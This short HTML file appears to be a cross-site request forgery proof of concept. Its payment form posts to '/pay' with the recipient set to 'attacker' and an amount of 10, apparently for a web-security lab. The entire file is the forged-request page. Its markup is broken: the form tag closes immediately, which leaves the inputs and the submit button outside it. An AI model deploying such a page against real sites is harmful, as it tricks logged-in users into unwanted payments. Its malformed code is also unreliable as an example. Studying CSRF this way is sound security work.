<!DOCTYPE html>
<html>
    <form action= "/pay?recipient=attacker&Amount=10" method="post"></form>
        <div class="form-group">
          <div class="form-label">To:</div>
          <div class="form-input"><input name="recipient" value = "attacker" type = "text" placeholder=""/></div>
        </div>
        <div class="form-group" value = 10>
          <div class="form-label">Amount:</div>
          <div class="form-input"><input name="amount" type= "number" value = 10 placeholder=""/></div>
        </div>
        <input class="form-button" type="submit" value="Pay"/>
      </form>
</html>
